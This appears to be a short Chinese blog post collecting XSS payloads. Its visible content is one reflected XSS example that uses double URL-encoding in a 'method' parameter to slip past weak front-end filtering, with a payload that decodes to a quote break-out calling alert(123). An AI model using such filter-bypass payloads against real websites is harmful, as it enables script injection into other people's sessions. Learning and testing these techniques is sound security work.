积累点自己的XSS语句【不定时更新】

本文通过一个具体的案例,展示了如何利用前端过滤不严格的问题,使用URL编码进行二次编码,实现反射型XSS攻击。该方法绕过了部分前端安全防护,对网站安全构成威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

怎么都给我过滤了。。。没办法了用图片保存吧。。。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1.前端过滤不严格导致XSS
将payload用url编码进行二次编码,实现反射型XSS
https://xxxx?method=%2567%2565%2574%2556%2561%256C%2569%2564%2561%2574%2565%2549%256D%2561%2567%2565%2522%253B%2561%256c%2565%2572%2574%2528%2531%2532%2533%2529%253B%2522
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值